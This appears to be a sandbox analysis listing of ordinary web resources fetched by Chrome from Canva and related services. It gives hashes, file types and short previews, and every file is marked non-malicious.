                                                                SHA-512:374DBE8424CC58293A97A3F620463D19EF0851340D27B980279636AD64451A100A907B03774F8B50EB62A6CE1F46CB190B1F4FC1281B8741D0D20A66BEF9A3D3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}........u.."............................................................................yJG....,.2[.kr.zj...N[A.........V[1C...y......A|kc..L....A|P_.<..\..;.....je....{.V....[AF....|P_.....l....c.`:n[..I&.S<...hf,.`..=..........................f..3..+.r..C1.xfg43.lW.I..........................Z.c.b:^_...e.c<...hf,.`..=..........................f..2./)...K$r...........@.........................:.t.W.K...a....X.^.'..........................[U.i..^..2.)I.C).......e..l...?..4....S...................xz.z....k5.p.7+.r.c)...e.uz...q.....c..............)M.A..z.z. ..........<yT......<......p.#.E(....f..=.G'.s.R.1.xfe...I.C.]7...`v.r....d.n|.jtz.s.....wY|.vw.O..;...../.7g......=............#:.5...)t...*m..wS...Y3..*[.s..Q.u<.4.Jg...S....7M.:.gD.&7....O...Tm..:.........9....=...y.'.y.......D....{..~.B.>.%.[.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text
                                                                Category:downloaded
                                                                Size (bytes):152
                                                                Entropy (8bit):5.2013248836234025
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9A8C568FAAD42DDC96633821409EFF3F
                                                                SHA1:108A0697C89C8D8E5C65CFB4F78A76AEC14E7CA7
                                                                SHA-256:0DF688D2242DDF686E3666D77CD5B6351EC413FD69A6D6DB81167DD0110CBDFB
                                                                SHA-512:F96B4462122F2546C2CA36994B4F25E135C72073C600B12475F377B162BDFED6D83460E33C0EDAB50DEA5A51F45E780262734EB94D88379E3315A611A3748915
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/f16c1cb2683100a2.ltr.css
                                                                Preview:.QeqCOA{height:100vh;left:0;position:fixed;top:0;width:100vw}.s1NnCg{pointer-events:none}./*# sourceMappingURL=sourcemaps/f16c1cb2683100a2.ltr.css.map*/
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (12761)
                                                                Category:downloaded
                                                                Size (bytes):12824
                                                                Entropy (8bit):5.622424931576843
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:905B59F4270DF1A73424BF71536F0224
                                                                SHA1:FB17F97B246FD7E14210579BE70954581D8AA8A3
                                                                SHA-256:13B0325A92EDDFF73004D5D4A60428739221A9DBE94B026164980DC2B48CA41E
                                                                SHA-512:0E4F277436FF741962F81EF95E32A86E955061D224E1ECA24DF3B65BFDDF8CAA017C370D06B8888C0441E1CF8EA01158EB8786A4DC8CC4D92E1AA86A0453A444
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/5bda23a61d2509fb.ltr.css
                                                                Preview:@font-face{font-display:swap;font-family:Noto Sans Variable;font-style:normal;font-weight:125 950;src:url(images/621675e6be83f675d33562d2ff7a0f63.woff2) format("woff2");unicode-range:u+06??}@font-face{font-display:swap;font-family:Noto Sans Variable;font-style:normal;font-weight:125 950;src:url(images/762fe37b99d49707e783d6281412d12f.woff2) format("woff2");unicode-range:u+0590-05ff}@font-face{font-display:swap;font-family:Noto Sans;font-style:normal;font-weight:400;src:url(images/d83221ee6a6841b17a754f68b6c5a3de.woff2) format("woff2");unicode-range:u+0900-097f}@font-face{font-display:swap;font-family:Noto Sans;font-style:normal;font-weight:600;src:url(images/e237b20d624e9275cdc02a523ab7f983.woff2) format("woff2");unicode-range:u+0900-097f}@font-face{font-display:swap;font-family:Noto Sans;font-style:normal;font-weight:700;src:url(images/3b5447850810ff964de17bcd37e03d5a.woff2) format("woff2");unicode-range:u+0900-097f}@font-face{font-display:swap;font-family:Noto Sans;font-style:normal;
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text
                                                                Category:downloaded
                                                                Size (bytes):6785
                                                                Entropy (8bit):4.764532758184024
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9C747CF07B2623FE6F77E47F5A134103
                                                                SHA1:7180E5B53413163E10A6CA1E94518AC2CEB7970A
                                                                SHA-256:476CDA2BDE7910A58186B7B58D2BE6D22D3CFACDFEDA3354134B84E43D76AC98
                                                                SHA-512:4C1894FD984FC35FBC725737F68B69982B4E53864EB8BF1B8A5826D4D62C682AD4D50C08BA4EAEE3FBE04D3B91EA22A79559AA77BE6BCF3B81025348C8CEB35A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://cdn.metadata.io/site-insights.js
                                                                Preview:(function () {. /**. * @type {string} Key for the visitor ID cookie.. */. const visitorIdKey = "Metadata_visitor_id";.. /**. * @type {string} Key for the session ID cookie.. */. const sessionIdKey = "Metadata_session_id";.. /**. * @type {string} IP address of the client.. */. let ip;.. /**. * Account configuration object.. */. const config = {. invalid: true. };.. /**. * Options object.. */. const opts = {. /**. * @type {string} Base URL for the CDN.. */. cdnBaseUrl: "https://cdn.metadata.io/pixel/config",.. /**. * @type {string} Base URL for the API.. */. baseUrl: "https://api-gw.metadata.io",.. /**. * @type {string} Account ID.. */. accountId: null. };.. /**. * Get the value of a cookie.. * @param {string} key - The key of the cookie.. * @returns {string|null} The value of the cookie, or null if not found.. */. const getCookieValue = (key) => {. const cookie = document.cookie.split("; ").find(fu
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (55289)
                                                                Category:dropped
                                                                Size (bytes):55418
                                                                Entropy (8bit):5.2011745666689
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:16E5D529039D25735AE0BA1D610125E8
                                                                SHA1:D7CAA746424A018583EC1E097F74A484C4FB1811
                                                                SHA-256:C6DE703F8EE214808496DCD92795AC8971782935ED75ABDD5624C814E69DAAEA
                                                                SHA-512:56AC6CDABC05070E1440C8CA4A60119B3555B2743BA8652A2A0282701ECC8E150AC343020D620D3F5CD6406F04966CDE54FD797530149AD0B2711E44F89165D0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:/*! @sentry/browser 7.16.0 (5386ce7) | https://github.com/getsentry/sentry-javascript */.var Sentry=function(t){const n=Object.prototype.toString;function e(t){switch(n.call(t)){case"[object Error]":case"[object Exception]":case"[object DOMException]":return!0;default:return h(t,Error)}}function r(t,e){return n.call(t)===`[object ${e}]`}function i(t){return r(t,"ErrorEvent")}function s(t){return r(t,"DOMError")}function o(t){return r(t,"String")}function c(t){return null===t||"object"!=typeof t&&"function"!=typeof t}function u(t){return r(t,"Object")}function a(t){return"undefined"!=typeof Event&&h(t,Event)}function f(t){return Boolean(t&&t.then&&"function"==typeof t.then)}function h(t,n){try{return t instanceof n}catch(t){return!1}}function l(t){return t&&t.Math==Math?t:void 0}const d="object"==typeof globalThis&&l(globalThis)||"object"==typeof window&&l(window)||"object"==typeof self&&l(self)||"object"==typeof global&&l(global)||function(){return this}()||{};function p(t,n,e){const r
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:dropped
                                                                Size (bytes):470
                                                                Entropy (8bit):4.428280927846403
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E5C5A4D109AEB5234E4405032DFD4800
                                                                SHA1:4208CA1C20A9914F396350866B5DB5BB3A851B77
                                                                SHA-256:0E19C6400D8E588E305CC6B80195926FEB73BD09F05732AAC6CCE1483A509A75
                                                                SHA-512:D238FFD9149EE1EF975BA39C7B7AA70CD255B10A2B68E4C1DC8BA29484E18C1925B86A8DD11969B648EA6322E474EDE5CC5792A76456D83E04B8C1DE82B810AD
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#FFAC33" d="M27.287 34.627c-.404 0-.806-.124-1.152-.371L18 28.422l-8.135 5.834a1.97 1.97 0 0 1-2.312-.008 1.971 1.971 0 0 1-.721-2.194l3.034-9.792-8.062-5.681a1.98 1.98 0 0 1-.708-2.203 1.978 1.978 0 0 1 1.866-1.363L12.947 13l3.179-9.549a1.976 1.976 0 0 1 3.749 0L23 13l10.036.015a1.975 1.975 0 0 1 1.159 3.566l-8.062 5.681 3.034 9.792a1.97 1.97 0 0 1-.72 2.194 1.957 1.957 0 0 1-1.16.379z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (4862)
                                                                Category:downloaded
                                                                Size (bytes):152716
                                                                Entropy (8bit):5.722132303992741
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A095B81C088BD5939AA0A623AF387025
                                                                SHA1:96744CC994F826B21349F0678EEA9BFF56B1335A
                                                                SHA-256:4AE3F8EFEB397067A4E410BF3D4BBEC7F102EFB289CF3EB4623334803E9BB044
                                                                SHA-512:7ED5DC2B2BA99CED58284CC021888613819ACB1BD21A9D111177637148A57677EAE4C44EE17EC6306A6458AC26D77D5F8B3036C1A2486E2F23788A4A16C6C7E5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/e0236ac137746c39.js
                                                                Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1389],{../***/ 813110:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var Xg;var Rg;var Pg;var wg;var qg;var Pa;var Df;var hf;var gf;var qe;var le;var ke;var hc;var Kb;var cd;var hd;var jd;var Xc;var dd;var ad;var F;var Zc;var Q;var E;var Za;var La;var Vc;var Wc;var $c;var P;var D;var Ec;var L;var O;var ed;var Na;var Ma;var R;var K;var $a;var ba;var Mc;var tc;var qc;var ic;var fb;var z;var bb;var Ha;var B;var t;.var baa,ea,fa,ha,oa,eaa,iaa,haa,gaa,kaa,laa,maa,naa,Ea,Fa,Ja,Ka,oaa,Xa,raa,qaa,Ra,Ta,Ua,Wa,Ya,Qa,paa,xaa,zaa,Caa,Baa,Daa,Eaa,gb,Haa,jb,hb,Oaa,Qaa,Kaa,nb,ub,Xaa,dba,iba,mba,lba,nba,jba,qba,rba,sba,Ob,vba,wba,xba,yba,zba,Aba,Bba,Cba,Dba,Fba,E
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (1297)
                                                                Category:downloaded
                                                                Size (bytes):1361
                                                                Entropy (8bit):5.4217047692101135
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:296B600CDB84185DD5DC6C1447D8F314
                                                                SHA1:BDDFAC0BE7BEF110C4895CBA847CB22BA741D3CC
                                                                SHA-256:4167A133ABCEA284FC936424B7493C6B65D166B75D45A770253F44FE193E723F
                                                                SHA-512:D8E1809E3FCB2A6B7E84E49F0662082F9E413A2F0462F01A375EF084052355F4FC869D18E29CAC9200769BB1FDDA53F5056D75AE5A2A9D673338C70890732CBB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/fe2daf192a497a52.runtime.js
                                                                Preview:(()=>{"use strict";var e,r={},t={};function n(e){var i=t[e];if(void 0!==i)return i.exports;var o=t[e]={exports:{}};return r[e](o,o.exports,n),o.exports}n.m=r,e=[],n.O=(r,t,i,o)=>{if(!t){var f=1/0;for(l=0;l<e.length;l++){for(var[t,i,o]=e[l],a=!0,s=0;s<t.length;s++)if((!1&o||f>=o)&&Object.keys(n.O).every((e=>n.O[e](t[s]))))t.splice(s--,1);else if(a=!1,o<f)f=o;if(a){e.splice(l--,1);var c=i();if(void 0!==c)r=c}}return r}else{o=o||0;for(var l=e.length;l>0&&e[l-1][2]>o;l--)e[l]=e[l-1];e[l]=[t,i,o]}},n.d=(e,r)=>{for(var t in r)if(n.o(r,t)&&!n.o(e,t))Object.defineProperty(e,t,{enumerable:!0,get:r[t]})},n.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),n.o=(e,r)=>Object.prototype.hasOwnProperty.call(e,r),n.p="",n.g.BUILD_VARIABLES=Object.assign(n.g.BUILD_VARIABLES||{},{PREFERRED_REACT_RENDERER:"concurrent"}),(()=>{var e={8581:0};n.O.j=r=>0===e[r];var r=(r,t)=>{var i,o,[f,a,s]=t,c=0
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (6502)
                                                                Category:downloaded
                                                                Size (bytes):73994
                                                                Entropy (8bit):5.4612649411951235
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A65374CE42E8AD0DC671D4C99EADE246
                                                                SHA1:457454C5C5CF798FABB34026E4316F92060BD35A
                                                                SHA-256:6957653B3B333DD9CE91BD54E0279A4BABA4BBEDC1ABAF42214DB1E9C382A9CB
                                                                SHA-512:35E6FD0DD9BA53E4DA4483DD01ADD59C991EC59053943E4F34A501B3A7A87E2156BA6D1995D3A5D9DEAA27F4F79371B3CF93855C480DF878AF60E16E944288AC
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/hjfept.907f138b060bb789.js
                                                                Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1389],{../***/ 476834:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;self._e4773d6932616a85f2eac86f437df8f7 = self._e4773d6932616a85f2eac86f437df8f7 || {};(function(__c) {/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var aa=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},da=function(a,b){if(b)a:{var c=ba;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ca(c,a,{configurable:!0,writable:!0,value:b})}},p=function(a,b){var c=[];.if(!a)throw Error(null==b?"invalid argument":ea(b,...c));},ea=function(a,...b){let
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (5198)
                                                                Category:downloaded
                                                                Size (bytes):5261
                                                                Entropy (8bit):5.648282639878751
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2C319109A2B47AFD971CB574E5EFCED3
                                                                SHA1:64921BAE82F169374ABFA53BCCCD7D23E49D871C
                                                                SHA-256:CE149E8EEB6C4D63C96BE0ED9FCEF7609BD6085457E3599C99C8976F0B771DCE
                                                                SHA-512:47FF329D5A64752EA366D22EE514074C3D4D80F038181DBC77D0A973F2B822C848F280FED0365359F3F7BF7AC9CE4F64A185860191964D7ED79905F8822219F7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/5f3d61278d9ddcd1.ltr.css
                                                                Preview:._1I5x5g{-webkit-tap-highlight-color:transparent;cursor:pointer;display:flex}.bV4U1g{align-items:center;padding:4px 0}.XsQNVg{cursor:not-allowed}.SPXzig{-webkit-appearance:none;appearance:none;margin:0;opacity:0;width:0}.ZJon7Q{align-self:flex-start}.ZJon7Q,.tdZD9A{display:inline-flex}.tdZD9A{align-items:center;background:var(--C-q6Ig);border-radius:4px;box-shadow:inset 0 0 0 1px var(---UopgA);flex:0 0;justify-content:center;margin:4px;transition:box-shadow .1s ease-in-out}.tdZD9A:before{content:"\00200B";width:0}.tdZD9A{height:16px;width:16px}.tdZD9A.nv35GQ{height:24px;width:24px}.VqRjiQ.tdZD9A{color:var(--eGVbng)}.s905NQ.tdZD9A{color:inherit}.AqfZZQ,.IbvMRg{color:var(--d1p99w);opacity:0}.tdZD9A.EPEuzg,.tdZD9A.te6xBw{box-shadow:inset 0 0 0 8px}.tdZD9A.nv35GQ.EPEuzg,.tdZD9A.nv35GQ.te6xBw{box-shadow:inset 0 0 0 16px}.tdZD9A.EPEuzg .IbvMRg,.tdZD9A.te6xBw .AqfZZQ{opacity:1}.tdZD9A.XsQNVg,.tdZD9A.nv35GQ.XsQNVg{background:var(--oqurdw);box-shadow:inset 0 0 0 1px var(--VjFOWQ)}.XsQNVg .AqfZZ
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JSON data
                                                                Category:downloaded
                                                                Size (bytes):20
                                                                Entropy (8bit):3.446439344671015
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2E1E0B28D6E7522CB687E20D37BCD8AA
                                                                SHA1:03D5EFE3719CAB433421C4D9BF6C73E0B8EB69E5
                                                                SHA-256:124CE91528D8ACB894BDC980ABDDF035B38CDC64CE13F088D431E0B10D61FB24
                                                                SHA-512:70BB31CA0F3907AB6B5860459643E422AAD6685F32D519C23E671CD46F29ABF2DB1F0C53E54313FF6FE7B54A75CDCA18A9232556B3273E6DB200BFCD22BA82BD
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://api.ipify.org/?format=json
                                                                Preview:{"ip":"8.46.123.33"}
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (11807)
                                                                Category:dropped
                                                                Size (bytes):11870
                                                                Entropy (8bit):5.143651720751228
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A2CFC97FC3A5F000266CC376ABA58107
                                                                SHA1:6AFE3FB067366C30F089348DCC7D8F6D873CF45A
                                                                SHA-256:76AB3D7B6F07A0308BDDA6A694AF4F88211FA3C8A937B23E2F47F60C1671B317
                                                                SHA-512:82A5CF066AD40D59D29336E0725015480E3198A7B48756F08242AA25D0C282EAF330C9E131CA70D15E2FCD9ADFC2524CCA6C1B878BD6BCD86D74D85B96EB5C2C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:"use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[8168],{681112:(t,n,e)=>{e.d(n,{d:()=>o});var r=e(35987),o=function(t){function n(n,e,r){var o=t.call(this)||this;return o.parent=n,o.outerValue=e,o.outerIndex=r,o.index=0,o}return r.ZT(n,t),n.prototype._next=function(t){this.parent.notifyNext(this.outerValue,t,this.outerIndex,this.index++,this)},n.prototype._error=function(t){this.parent.notifyError(t,this),this.unsubscribe()},n.prototype._complete=function(){this.parent.notifyComplete(this),this.unsubscribe()},n}(e(110979).L)},962039:(t,n,e)=>{e.d(n,{L:()=>o});var r=e(35987),o=function(t){function n(){return null!==t&&t.apply(this,arguments)||this}return r.ZT(n,t),n.prototype.notifyNext=function(t,n,e,r,o){this.destination.next(n)},n.prototype.notifyError=function(t,n){this.destination.error(t)},n.prototype.notifyComplete=function(t){this.destination.complete()},n}(e(110979).L)},70211:(t,n,e)=>{e.d(n,{Yc:()=>h,xQ:()=>a});var r=e(35987),o=e(61244),i=e(110
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (1706)
                                                                Category:downloaded
                                                                Size (bytes):996442
                                                                Entropy (8bit):5.624810189183122
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8A00A0724F47ED91464B8CD6D2117D8F
                                                                SHA1:02AF6AB2CDDF926AB13F1FD0DCEF0BBE8A8962A4
                                                                SHA-256:3E2FC5694B67C039F613E7FCEE075102D460B529AD22479ADC74DFE16B7ADF49
                                                                SHA-512:E6577C1465AC094B800895ACF75A657073BB8B6744D1DC167B16159448E239302029CAAF3AB90EA6B5AB2B4757AE728E76DBB6A435AA570A93CA46CCE609DA5F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://chunk-composing.canva.com/chunk-batch/9b54b3b1abd84df7.js+b440ac8bcac09752.js+79a1b10ef050797c.js+ab22cdb76695602b.js+483dc1a49fc2d26c.js+7f060f5f480ef73f.js+9ff4264c60c9fe68.js+73bf1b37ba920daf.js+5abb10417e1e3d72.js
                                                                Preview:;// __FILE_CONTENT_FOR__:9b54b3b1abd84df7.js.(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1003],{../***/ 75986:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(642158);__web_req__(46127);__web_req__(801993);__web_req__(389580);__web_req__(211312);__web_req__(708257);__web_req__(79194);__web_req__(485014);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var Dt=__c.Dt;var B=__c.B;var z=__c.z;var yp=__c.yp;var oC,pC,qC,uC,vC,iYa,jYa,lYa,kYa,nYa,oYa,CC,qYa,EC,tYa,uYa,FC,vYa,HC,IC,wYa,JC,KC,zYa,yYa,AYa,CYa,DYa,xYa,FYa,MC,EYa,GYa,HYa,IYa,KYa,LYa,BYa,JYa,NC,OYa,RYa,SYa,TYa,$Ya,aZa,cZa,dZa,eZa,cYa,dYa,eYa,fYa,hYa,DC,rYa,sYa,GC,gZa,hZa,RC;oC=function(a){const b=a.Gma;0!==b&&(a.result+="|=d"+(1<b?b:"")+"|",a.Gma=0)};pC=function(a){const b=a.ata;0!==b&&(a.result+="|=n"+(1<b?b:"")+"|",a.ata=0)};.qC=funct
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (26754)
                                                                Category:dropped
                                                                Size (bytes):26898
                                                                Entropy (8bit):5.214632909935732
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:994BCFB820F538248954EFE37A9F2357
                                                                SHA1:70DEEE1BF98FF7F1FEAADD95F01EE0E65FA5BC96
                                                                SHA-256:57F3AC741599117ECC612971656AB96B2688F968949B6173EEFAE71D4BBBE911
                                                                SHA-512:0203732E50839E2E7225C4E7F7C9E50978CA00D010D5A8C7F0A91C957131317474F1818DD889001CAFE5DEE2708DE05BA50B9B7945D07BC2E08512F79B5EB57C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:/*! For license information please see e6728a4f0b312b23.vendor.js.LICENSE.txt */."use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[2306],{699601:(e,r)=>{r.Z=function(){for(var e=[],r=0;r<arguments.length;r++)e[r]=arguments[r];return 2===e.length?n(e[0],e[1])||null:e.slice(1).reduce((function(e,r){return n(e,r)}),e[0])||null};var t=new WeakMap;function n(e,r){if(e&&r){var n=t.get(e)||new WeakMap;t.set(e,n);var i=n.get(r)||function(t){o(e,t),o(r,t)};return n.set(r,i),i}return e||r}function o(e,r){"function"==typeof e?e(r):e.current=r}},127661:(e,r,t)=>{t.d(r,{K5:()=>d,Om:()=>V,YN:()=>_,kq:()=>j,p4:()=>f,zO:()=>w});var n=t(168949),o=function(){};function i(e,r){void 0===r&&(r="Illegal state"),e||function(e){throw new Error("[mobx-utils] "+e)}(r)}var s=function(e){return e&&e!==Object.prototype&&Object.getOwnPropertyNames(e).concat(s(Object.getPrototypeOf(e))||[])},u=function(e){return function(e){var r=s(e);return r.filter((function(e,t){return r.indexOf(e)
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):842
                                                                Entropy (8bit):4.957424326112546
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:3A05DBF1CDD156FCD1677A0B444CC36F
                                                                SHA1:4DBD36F62A617F47B69FB2D5F83BF0FE36ECE44A
                                                                SHA-256:4C122BDEABCF8A8C613B81B5B881469574DAA61B870651D9F06D0F81B4405271
                                                                SHA-512:CE05D3A04F285E246AC43798C384674FB5D292CEA0911CACFD6A7E10772C77B6997D5ED50BF298DDBB6096A02D06BC1E01324C1A35623E07834C8AFC63D536E6
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/images/3a05dbf1cdd156fcd1677a0b444cc36f.svg
                                                                Preview:<svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M32 16c0 8.837-7.163 16-16 16S0 24.837 0 16 7.163 0 16 0s16 7.163 16 16Z" fill="url(#_1562409365__a)"/><path d="M12.235 12.235c0 1.56-.903 2.824-2.017 2.824-1.114 0-2.017-1.264-2.017-2.824 0-1.56.903-2.823 2.017-2.823 1.114 0 2.017 1.264 2.017 2.823ZM23.53 12.047c0 1.456-.843 2.635-1.883 2.635s-1.882-1.18-1.882-2.635c0-1.455.843-2.635 1.882-2.635 1.04 0 1.882 1.18 1.882 2.635ZM19.765 22.588c0 2.6-1.687 4.706-3.765 4.706-2.08 0-3.765-2.105-3.765-4.706 0-2.598 1.685-4.706 3.765-4.706 2.078 0 3.765 2.108 3.765 4.706Z" fill="#664500"/><defs><linearGradient id="_1562409365__a" x1="16" y1="32" x2="16" y2="0" gradientUnits="userSpaceOnUse"><stop stop-color="#FFCC4D"/><stop offset="1" stop-color="#FFDF8E"/></linearGradient></defs></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (10774)
                                                                Category:downloaded
                                                                Size (bytes):10837
                                                                Entropy (8bit):5.33630761588339
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:34E1C8F1D5FDC60E02201C32EFB25E58
                                                                SHA1:F986690F28303BB9B00FC4C59B8576885C812289
                                                                SHA-256:66491D47F51B0E9C879C3224EF5B95A67595E838416616BC737A75D847C4B6AE
                                                                SHA-512:9EDCA9ECB864940B1F701012F67ACC0EC0E66CD4B04AF99CC396188CF0DCFC990B9AF2348A0E0B11BF79D50189935D906FB0EC7995C60879D7041263C1D21D07
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/3ca27320fba118d7.vendor.js
                                                                Preview:"use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5436],{353610:(t,e,n)=>{n.d(e,{I:()=>i});var r=n(712343);class i{constructor(){i.prototype.__init.call(this)}static __initStatic(){this.id="Dedupe"}__init(){this.name=i.id}setupOnce(t,e){const n=t=>{const n=e().getIntegration(i);if(n){try{if(function(t,e){if(!e)return!1;if(function(t,e){const n=t.message,r=e.message;if(!n&&!r)return!1;if(n&&!r||!n&&r)return!1;if(n!==r)return!1;if(!c(t,e))return!1;if(!o(t,e))return!1;return!0}(t,e))return!0;if(function(t,e){const n=u(e),r=u(t);if(!n||!r)return!1;if(n.type!==r.type||n.value!==r.value)return!1;if(!c(t,e))return!1;if(!o(t,e))return!1;return!0}(t,e))return!0;return!1}(t,n._previousEvent))return("undefined"==typeof __SENTRY_DEBUG__||__SENTRY_DEBUG__)&&r.kg.warn("Event dropped due to being a duplicate of previously captured event."),null}catch(s){return n._previousEvent=t}return n._previousEvent=t}return t};n.id=this.name,t(n)}}function o(t,e){let n=s(t),r=s(e);
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                Category:dropped
                                                                Size (bytes):4414
                                                                Entropy (8bit):5.9195472440471955
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A0C86DA7FC37EA50E848C4733761D53E
                                                                SHA1:7B53A4FE8198AA654C02282134DCC19E0C07CC9A
                                                                SHA-256:EC2FBAD47E598FE06C7A2B825224B3B1B8D8221F3002E6370E627D459FF0634A
                                                                SHA-512:6FD3BB6D1392F89DCF63A37A9086517620A63C6D933885ACDB61F99BB8AF137D2DD184C59EF92C173E214711DCEAE9585A5B574AFB422A4A0969D99C86264339
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:...... .... .(.......(... ...@..... ......................................................@...........#h..!g\."h..!i..#k..$l..$n..$o..%q..%r..'s[.#t..........@...................................................UU..........,]).+_..)b..*j..)l..'l..%l..$k..#m..$q..&u..(y..(z..&t..&u..%v)..........U......................................@@..........3Y..1[..4b..1]..0\..0^../`..,c..+f..)i..&l..%o..%q..&s..&t..)|..'v..(v..........@...............................33......8X .7V..;]..7V..8W..7W..7X..8Z..=_..?b..?e..<g..5g..-i..*m..(q..&s..&t..'u..*...(x..(x .....3f......................@@......CN..?R..@W..=R..=R..>S..?S..GZ..<S...?...5...6...@..!T..?f..;i..0j..-o..)s..'u..'w..*}..(y..'z......@...............UU......PP .HL..IO..EN..DO..CN..GQ..GQ...!..HR................ly...B...O..Dh..7g..3l...q..)v..(w..)|..)z..(x ......U..................SG..UK..PG..NI..LI..NN..FF..76..................................|....>..He..=e..8i..3o..-t..*w..+...){..............@......\A..cG..ZB..XC..VD..VG..QC..OA...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:dropped
                                                                Size (bytes):1865
                                                                Entropy (8bit):4.5836861143934104
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:3E78EF31F2928A74C6D7BA19B91D0570
                                                                SHA1:FA840BD4404B1B843A72164F2491AF6C4718A214
                                                                SHA-256:847435388F6B42D6C869D02DF3EC08D61333A19AC4B90EBBFF3BC0B87B60A202
                                                                SHA-512:0B1951AD9492468748B18217003BF7EBAD56FA14CB434C37D6DF2440C43D73AF5AA9068EC517596E9D63B150F3ED28C20F44FFCD6814DF70D2C9228C91994DDE
                                                                Malicious:false
                                                                Reputation:unknown
